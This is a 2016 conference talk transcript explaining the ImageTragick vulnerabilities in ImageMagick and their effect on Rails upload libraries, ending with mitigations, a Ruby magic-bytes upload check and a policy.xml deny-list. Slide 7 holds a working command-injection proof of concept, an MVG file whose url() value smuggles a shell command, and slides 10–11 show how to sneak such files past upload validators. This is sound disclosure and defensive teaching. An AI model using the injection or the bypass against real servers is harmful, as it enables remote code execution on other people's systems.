ImageTragick and Rails

This talk looks at the details of ImageTragick, how Ruby on Rails applications may be affected, and steps to mitigate the problem. A live demonstration of the vulnerability was performed on a Rails application as part of the original presentation at WellRailed.

ImageTragick is a collection of security vulnerabilities publicly disclosed in May 2016 that affected the ImageMagick image processing library. The most critical vulnerability potentially allowed an attacker to gain remote access to a system by uploading a file to an exposed web application.

Presented at WellRailed on 26 May 2016 — https://www.meetup.com/wellrailed/events/231113047

Sample vulnerable Rails application and Docker image — https://github.com/gchan/imagetragick-rails

Blog post — https://blog.devgordon.com/imagetragick-and-rails/

Gordon Chan

May 26, 2016
Transcript

  1. What is ImageMagick?

    ImageMagick® is a software suite that allows you to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, JPEG-2000, GIF, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG. https://www.imagemagick.org
  2. Magic Bytes

    ImageMagick identifies file type by its first few bytes:

      # ImageMagick/MagickCore/magic.c
      { "JPEG", 0, MagicPattern("\377\330\377") },
      { "GIF",  0, MagicPattern("GIF8") },
      { "PNG",  0, MagicPattern("\211PNG\r\n\032\n") },
      { "SVG",  1, MagicPattern("?XML") },
      { "MVG",  0, MagicPattern("push graphic-context") },

    It ignores file extensions:

      $ identify rose.foo
      rose.foo JPEG 70x46 70x46+0+0 8-bit sRGB 2.36KB 0.000u 0:00.000
  3. Coders and Delegates

    Coders support the reading and/or writing of an image format (e.g. JPEG). Delegates (external programs, invoked as shell commands) may be used to process files:

      $ convert -list delegate
      ...
      bmp<=wdp    "mv" "%i" "%i.bmp"; "JxrEncApp" -i "%i.bmp" -o "%o.jxr"; mv "...
      blender =>  "blender" -b "%i" -F PNG -o "%o" "\n" "convert" -concatenate "%o*.png...
      doc =>      "soffice" --headless --convert-to pdf --outdir `dirname "%i"` ...
      pdf<=>ps    "gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=...
      mpeg =>     "ffmpeg" -nostdin -v -1 -i "%i" -vframes %S -vcodec pam -an -f raw...
      https =>    "curl" -s -k -L -o "%o" "https:%M"
      ...
  4. Delegates use system()

    Commands are executed in the host environment:

      "curl" -s -k -L -o "%o" "https:%M"

    Parameters are substituted for values (e.g. file names, URLs):

      "curl" -s -k -L -o "/var/tmp/magick-95558" "https://a.com/img.jpg"
  5. Magick Vector Graphics (MVG)

    Describes 2D vector and mixed vector/raster graphics:

      push graphic-context
      viewbox 0 0 624 369
      affine 0.283636 0 0 0.283846 -0 -0
      push graphic-context
      push graphic-context
      fill 'darkslateblue'
      stroke 'blue'
      stroke-width 1
      rectangle 1,1 2199,1299
      fill 'url(https://example.com/img.jpg)'

    url() will use the HTTPS delegate, i.e. curl:

      "curl" -s -k -L -o "/var/tmp/magick23" "https://example.com/img.jpg"
  6. ImageTragick

    Public disclosure on May 3, 2016. A collection of security vulnerabilities:
    - Remote code execution (RCE)
    - File reading/moving/deletion
    - Server-side request forgery (SSRF)
  7. CVE-2016-3714

    Insufficient character filtering leads to code execution:

      # exploit.mvg
      push graphic-context
      viewbox 0 0 640 480
      fill 'url(https://example.com/img.jpg";echo hello world")'

      $ convert exploit.mvg out.png
      hello world

    HTTPS delegate:

      "curl" -s -k -L -o "%o" "https:%M"

    '%M' is replaced with '//example.com/img.jpg";echo hello world', so the shell runs:

      "curl" ... "https://example.com/img.jpg";echo hello world"
  8. Attack Vector

    Attacker uploads an image containing code they choose. Image is processed with ImageMagick => code is executed.
  9. Ruby on Rails

    Ruby gems for file and image uploads:
    - Paperclip and CarrierWave
    Both use ImageMagick to process images. CarrierWave does so through MiniMagick, a thin wrapper around ImageMagick's convert/identify commands; Paperclip invokes convert directly.
  10. File Extensions Mean Nothing

    File name/extension and content-type whitelisting: CarrierWave believes what you tell it and performs no file inspection. Remember, ImageMagick uses 'magic bytes' to identify file types, not file extensions. ∴ CarrierWave is vulnerable.
  11. Paperclip is Vulnerable

    Paperclip inspects files to check their content-type:

      $ file -b --mime image.png
      image/png; charset=binary

    But it only compares the first part of the content-type (image), so we can present an SVG as a PNG:

      $ file -b --mime svg.png
      image/svg+xml; charset=us-ascii

    SVGs can reference external images (!)
  12. Demo - Rails Application

    - Ruby 2.3.1
    - Rails 4.2.6
    - CarrierWave 0.11.2
    - Paperclip 4.3.6
    - MiniMagick 4.5.1
    - Debian 'jessie', ImageMagick 8:6.8.9.9-5+deb8u1
    - Docker: gordonchan/imagetragick-rails
    - Rails and Docker defaults
    https://github.com/gchan/imagetragick-rails
  13. Code #1

      class CarrierWaveImageUploader < CarrierWave::Uploader::Base
        version :thumb do
          process resize_to_fill: [200, 200]
        end
        ...
        # Both allow-lists trust what the client sends (file name and declared
        # content type); the file body itself is never inspected.
        def extension_white_list; %w(jpg jpeg gif png); end
        def content_type_whitelist; [/image\//]; end
      end
  14. Code #2

      class Image < ActiveRecord::Base
        mount_uploader :carrier_wave_image, CarrierWaveImageUploader

        has_attached_file :paperclip_image, styles: { thumb: "100x100#" }
        # Paperclip's spoof check only compares the media type ("image"), so an
        # SVG named .png and declared as image/png passes both validators.
        validates_attachment_content_type :paperclip_image, content_type: ["image/jpeg", "image/png"]
        validates_attachment_file_name :paperclip_image, matches: [/png\Z/, /jpe?g\Z/]
      end
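The validators in Code #1 and #2 accept whatever the client declares. The following is an added example, not code from the talk or from the gchan/imagetragick-rails repository: a plain-Ruby magic-bytes check for untrusted uploads, shown beside a Paperclip-style check that only compares the part of the content type before the slash. The `sniff` function is a simplified, hypothetical stand-in for `file -b --mime`, and the three sample uploads (a PNG header, an SVG renamed to .png, an MVG file renamed to .jpg) are constructed inline.

```ruby
# Added example (not code from the talk or from gchan/imagetragick-rails):
# a magic-bytes check for untrusted uploads, shown beside a Paperclip-style
# check that only compares media types. Sample files are constructed inline.
require 'stringio'

module UploadCheck
  # Signatures of the raster formats we are willing to accept. The byte
  # strings are the magic.c patterns from slide 2, written as Ruby escapes.
  RASTER_SIGNATURES = {
    'image/jpeg' => "\xFF\xD8\xFF".b,
    'image/gif'  => 'GIF8'.b,
    'image/png'  => "\x89PNG\r\n\x1A\n".b,
  }.freeze

  # Read the leading bytes of an IO without consuming it.
  def self.read_header(io, length = 512)
    header = io.read(length).to_s.b
    io.rewind
    header
  end

  # Simplified, hypothetical stand-in for `file -b --mime`: sniff a media type
  # from the header. An XML document containing <svg> is reported as
  # image/svg+xml, which is exactly what lets it masquerade as an image.
  def self.sniff(header)
    RASTER_SIGNATURES.each { |type, sig| return type if header.start_with?(sig) }
    text = header.dup.force_encoding('UTF-8')
    return 'application/octet-stream' unless text.valid_encoding?
    return 'image/svg+xml' if text =~ /\A\s*<\?xml/ && text.include?('<svg')
    return 'text/plain' if text =~ /\A[[:print:][:space:]]*\z/
    'application/octet-stream'
  end

  # Paperclip-style spoof check as the talk describes it: sniffed and declared
  # types only have to agree on the part before the slash ("image").
  def self.weak_check(io, declared_type)
    sniff(read_header(io)).split('/').first == declared_type.split('/').first
  end

  # Hardened check: the declared type must be an allow-listed raster format
  # AND the file must start with that format's signature. An SVG or MVG file
  # renamed to .png carries no PNG signature, so it is rejected before
  # ImageMagick ever sees it.
  def self.strict_check(io, declared_type)
    signature = RASTER_SIGNATURES[declared_type]
    return false if signature.nil?
    read_header(io).start_with?(signature)
  end

  # Constructed sample uploads: a real PNG header, the SVG-as-PNG trick from
  # slide 11, and an MVG file (slide 5) renamed to .jpg.
  SAMPLES = {
    real_png:   "\x89PNG\r\n\x1A\n\x00\x00\x00\rIHDR".b + ("\x00" * 16).b,
    svg_as_png: <<~SVG.b,
      <?xml version="1.0" encoding="UTF-8"?>
      <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
        <image xlink:href="https://example.com/img.jpg" width="10" height="10"/>
      </svg>
    SVG
    mvg_as_jpg: "push graphic-context\nviewbox 0 0 640 480\nfill 'url(https://example.com/img.jpg)'\n".b,
  }.freeze

  # Content types as the client would declare them for each sample.
  DECLARED = { real_png: 'image/png', svg_as_png: 'image/png', mvg_as_jpg: 'image/jpeg' }.freeze

  # Returns { sample_name => [weak_check result, strict_check result] }.
  def self.verdicts
    SAMPLES.each_with_object({}) do |(name, bytes), out|
      io = StringIO.new(bytes)
      out[name] = [weak_check(io, DECLARED[name]), strict_check(io, DECLARED[name])]
    end
  end
end

if $PROGRAM_NAME == __FILE__
  UploadCheck.verdicts.each do |name, (weak, strict)|
    puts format('%-11s weak=%-5s strict=%s', name, weak, strict)
  end
end
```

The weak check lets the SVG through because `image/svg+xml` and `image/png` share the media type `image`; the strict check rejects it because the declared type is held to its own signature. The MVG sample fails the weak check too (it sniffs as plain text), which is why the talk's Paperclip bypass goes through SVG rather than a bare MVG file. Wire `strict_check` into a CarrierWave `before :cache` callback or a custom Paperclip validator, and keep the policy.xml and vendor patch in place as well: a signature check stops renamed text files, not malformed data inside a genuine PNG or JPEG.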
  15. Mitigation

    - Patches available for Debian (May 16); Ubuntu patches coming soon? (as at May 26)
    - Disable vulnerable coders (policy.xml)
    - Test magic bytes of untrusted files
    - Consider ImageMagick alternatives
    - Sandbox image processing (seccomp, SELinux)
    - General server security
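For the "disable vulnerable coders" step, here is an added example that is not from the deck or the sample repository: the coder deny-list published with the ImageTragick disclosure, in ImageMagick's policy.xml syntax. On the Debian jessie setup used in the demo the file is assumed to be /etc/ImageMagick-6/policy.xml; the entries go inside the existing <policymap> element rather than replacing the file.

```xml
<policymap>
  <!-- Added example: coder deny-list from the ImageTragick disclosure.
       Assumed location on Debian/Ubuntu: /etc/ImageMagick-6/policy.xml -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
</policymap>
```

Confirm the file is being read with `convert -list policy`, which prints the active policies; each blocked coder should be listed with rights none. With HTTPS, URL and MVG disabled, the url() fill from slides 5 and 7 no longer reaches the curl delegate. This is defence in depth alongside the vendor patch, not a substitute for it, and it will break any legitimate use of MVG, MSL or TEXT input in the application.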